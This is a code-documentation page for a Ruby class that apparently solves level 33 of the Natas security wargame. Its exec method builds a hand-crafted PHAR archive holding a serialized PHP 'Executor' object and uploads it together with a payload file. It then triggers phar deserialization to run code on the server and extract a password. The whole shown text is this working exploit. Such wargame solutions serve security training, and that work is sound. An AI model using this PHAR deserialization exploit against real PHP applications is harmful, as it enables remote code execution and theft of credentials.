class NatasLevel33

Level 33

Constants

LEVEL
MAX_FILESIZE
PAGE
PAYLOAD
PAYLOAD_FILENAME
PHARNAME
PHAR_FILENAME

Public Instance Methods

exec() click to toggle source
# File lib/natas.rb, line 955
def exec
  payload_signature = Digest::MD5.hexdigest(PAYLOAD)
  log("Payload MD5 signature: #{payload_signature}")

  phar_payload = %(<?php __HALT_COMPILER(); ?>\r\n\xD4\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x00\x00\x9D\x00\x00\x00O:8:\"Executor\":3:{s:18:\"\x00Executor\x00filename\";s:#{PAYLOAD_FILENAME.bytesize}:\"#{PAYLOAD_FILENAME}\";s:19:\"\x00Executor\x00signature\";s:#{payload_signature.bytesize}:\"#{payload_signature}\";s:14:\"\x00Executor\x00init\";b:0;}\t\x00\x00\x00empty.php\x00\x00\x00\x00\x8C\x9CSa\x00\x00\x00\x00\x00\x00\x00\x00\xB4\x01\x00\x00\x00\x00\x00\x00).dup
  phar_payload.force_encoding('ascii-8bit')
  phar_signature = Digest::SHA1.digest(phar_payload)
  log("PHAR SHA1 signature: #{phar_signature.unpack1('H*')}")
  phar_payload << phar_signature
  phar_payload << "\x02\x00\x00\x00GBMB"

  log("Uploading file with payload: #{PAYLOAD_FILENAME}")
  data = [
    ['filename', PAYLOAD_FILENAME],
    ['uploadedfile', PAYLOAD, { filename: 'uploadedfile' }]
  ]
  post(PAGE, {}, data, multipart: true)

  log("Uploading file with PHAR payload: #{PHAR_FILENAME}")
  data = [
    ['filename', PHAR_FILENAME],
    ['uploadedfile', phar_payload, { filename: 'uploadedfile' }]
  ]
  post(PAGE, {}, data, multipart: true)

  log("Executing PHAR payload: #{PHARNAME}")
  data = [
    ['filename', PHARNAME],
    ['uploadedfile', "\x00" * (MAX_FILESIZE + 1), { filename: 'uploadedfile' }]
  ]
  data = post(PAGE, {}, data, multipart: true).body

  match = /Password: (\w+)/.match(data)
  not_found unless match
  found(match[1])
end